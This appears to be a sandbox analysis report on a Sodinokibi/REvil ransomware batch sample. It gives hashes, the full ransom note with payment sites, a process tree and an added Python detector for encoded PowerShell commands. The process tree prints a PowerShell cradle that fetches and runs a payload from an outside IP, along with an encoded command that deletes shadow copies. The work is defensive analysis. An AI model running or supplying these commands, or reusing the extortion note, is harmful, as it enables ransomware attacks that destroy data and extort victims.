Analysis

  • max time kernel
    132s
  • max time network
    54s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    15-05-2020 19:19

General

  • Target

    d414776d8291887b69e7e08716350a94.bat

  • Size

    216B

  • MD5

    44b1551634044bfd5c2101792984ab6a

  • SHA1

    c1c890dd032188b9c1488e5cf4ff4f22d88b74e5

  • SHA256

    d3acbb0ddca79d785f4a3c766cceeb94bc468b19bfa0ba495af8182fbd9c55a4

  • SHA512

    faae8800cab7d6fa3470130c293609b65607156bcb9403ac83e9cd20a4dfeea2c689287b066320dd344415d189fe9d01f2a2913f1d51c008da36b18a62bbd677

Malware Config

Extracted

Language

ps1

Source

ps1.dropper

URLs

http://185.103.242.78/pastes/d414776d8291887b69e7e08716350a94

Extracted

Path

C:\3uxah42q-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===---

[+] Whats Happen? [+]

Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 3uxah42q.
By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

[+] What guarantees? [+]

Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.

[+] How to get access on website? [+]

You have two ways:

1) [Recommended] Using a TOR browser!
  a) Download and install TOR browser from this site: https://torproject.org/
  b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B5B9A722923F5083

2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
  a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
  b) Open our secondary website: http://decryptor.cc/B5B9A722923F5083

Warning: secondary website can be blocked, thats why first variant much better and more available.

When you open our website, put the following data in the input form:
Key:

VYG70WUZy3kEjpHqU7QmrEsZvjO/SRI5NDyPznTcEXekF6anHdaLyTCrVV8u6JzD
MyMlPlR8M45R0Pik7XTMk193T+VbVs9pRvFf+cMw30CbQLGMOUxMWq3QkNUSxw9p
Ho4SAts+zkg25HJMQJ/mj4U5X2oQb+oyG7K4C9hRVvLR/DW2yGtfBPkgD5w3KeVD
xG8+kyxN5iWa2iIorsjWZfkaHim2y0E0bMMz5DuKwDFy+TglDj00gKWAdex3ZSyH
vpJLxWAM/rwZngy98I0Oyz1n0UxmmxwqxzynLElOPMqxnvlBlqceuAAEBJRC3u/L
aoJAKgcBeX768957DWlJ71PgEsbd7e591RNiDOTRdT+157xNSZM8ODz952N1dnd2
vQtIGI8SyLvZMuFqHVB4N9VbAjQ8ulicfJjBUcLeaaODlbw2rVPwZVBVWjrkRXgd
Z1JrpY1j+ihevU4CAR66AsMS7l0mv3MoMG/54HonSjVjaSTOaUGMmHj5AvB7r/R5
dJPfYDNjDgizDNpiutJGuxcq5bO5uTE0b91jqOEkS7A1rjFGIcmydL2xIIkMXL5+
9limun1yuPlcOrZJU5DB0hlFVxcoBznVB6cn7qEAZ5/2JZGZQh1zlqnvB+8Vyzqa
ZDTpjx5kK+j3uvmel5Dme5xtnlCr9i1ucIO2viMIGhUlmgXLIXFfQStP79VlFUJi
6K1ot3ifnoINMie3+2FZtccgmpcpOMf9b14xe5Zzo7u0gv1INYgNGbXoWmYGgahS
JAdtvA4GGYkxJhdLw1X+nKQIrtW30FSXS1TJ0Bcz85faquj5pAIcdmU3LhKt5CvM
VIDk4emJCRsKMAM9BGzmMbu/TUDSNy3Vw3DrW+5kKVFgc5Timw/qVXq62WHij1Hr
9p1OAkj8N1ijVOivZXzxZqn5EOuKLZs6jacMzKqobTQ5LB7PSxI6AhOlmeRfXVWW
HljmGUU7AtoZdFbGOMoWJn2FQkYE+u+u+kKlaGUR8xUl7SuD7GyoCRVeDstajAQ2
Emf/m46vK6wm49rq0AwFHYivBu8alXNG1zmi9nGTD6Y9KnY4jkgmLwi44Oy4inK+
ZbzwAwqIy/8BRPqmzbVP83n4qNvWVcTMzuCAzG1OeylHeLjmKI1YAug+0v/i+NES
0/M03ID8bvoyxvO33F8tb3imAUkRlK9+2n/PVuKj4KzkU2EEJ0vUHTL3Gnr44Fjt
uK5NdxkRoh39Eeew3S3218jCcrhrag5xVV+Bx7WCq8nsPG+30BX/HFeMPMCKKXIg
vzFew25oFpd2w++6HKK2TFKc4hIp5I3g3/B1CIGDFi1J2+Ju

-----------------------------------------------------------------------------------------

!!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B5B9A722923F5083

http://decryptor.cc/B5B9A722923F5083

Signatures

  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 42 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\d414776d8291887b69e7e08716350a94.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1440
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d414776d8291887b69e7e08716350a94');Invoke-IDZVZHFEB;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      PID:884
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:524
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1676
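
The process tree above records the full chain: cmd.exe runs the .bat, which starts powershell.exe with an IEX/DownloadString cradle that pulls the next stage from 185.103.242.78; that process spawns a second powershell.exe with an -e (EncodedCommand) argument, and vssvc.exe is started as a side effect. The -e argument is base64 of a UTF-16LE string; decoded it reads Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, the WMI shadow-copy wipe that explains why the Volume Shadow Copy service was woken up. The Python below is an added example, not part of this report or of the sample, that decodes such an argument and flags the two behaviours visible here. The function and indicator names are mine; the vssadmin and wmic patterns are common equivalents added for completeness and were not observed in this run. The two command lines are copied from the process tree on this page.

```python
import base64
import re

# Copied from the process tree on this page (PID 884 and PID 524).
CMD_PID884 = (
    "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe "
    "\"IEX (New-Object System.Net.WebClient).DownloadString("
    "'http://185.103.242.78/pastes/d414776d8291887b69e7e08716350a94');"
    "Invoke-IDZVZHFEB;Start-Sleep -s 10000\""
)
CMD_PID524 = (
    "powershell -e "
    "RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# The leading (?:^|\s) keeps "-e" from matching inside "Get-Expression" and similar.
ENCODED_ARG_RE = re.compile(
    r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE
)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)

# Indicator name -> pattern. Both behaviours appear in this report; the vssadmin and
# wmic alternatives are my additions (assumption: not seen in this run).
INDICATORS = {
    "shadow_copy_deletion": re.compile(
        r"Win32_Shadowcopy.*?\.Delete\(|vssadmin.*?delete\s+shadows|wmic.*?shadowcopy\s+delete",
        re.IGNORECASE | re.DOTALL,
    ),
    "download_cradle": re.compile(
        r"(?:IEX|Invoke-Expression).*?DownloadString|DownloadString.*?(?:IEX|Invoke-Expression)",
        re.IGNORECASE | re.DOTALL,
    ),
}


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if absent/invalid.

    powershell.exe expects base64 over the UTF-16LE bytes of the script, so a
    plain .decode('utf-8') would yield NUL-separated characters; decode as UTF-16LE.
    """
    m = ENCODED_ARG_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # binascii.Error (bad base64) is a ValueError subclass.
        return None


def analyze_powershell_cmdline(cmdline):
    """Decode any encoded argument and match indicators over raw plus decoded text."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if decoded is not None:
        hits.append("encoded_command")
    return {"decoded": decoded, "indicators": sorted(hits), "urls": URL_RE.findall(text)}


if __name__ == "__main__":
    for label, cmd in (("PID 884", CMD_PID884), ("PID 524", CMD_PID524)):
        result = analyze_powershell_cmdline(cmd)
        print(label, result["indicators"], result["urls"])
        if result["decoded"]:
            print("  decoded:", result["decoded"])
```

In a detection pipeline the same function runs over Sysmon event 1 or Windows 4688 command lines; the useful signal here is the pair of parent and child, a PowerShell download cradle whose child is an encoded PowerShell that touches Win32_ShadowCopy, followed by vssvc.exe starting. That sequence is worth an alert on its own even before the ransom note lands.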

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms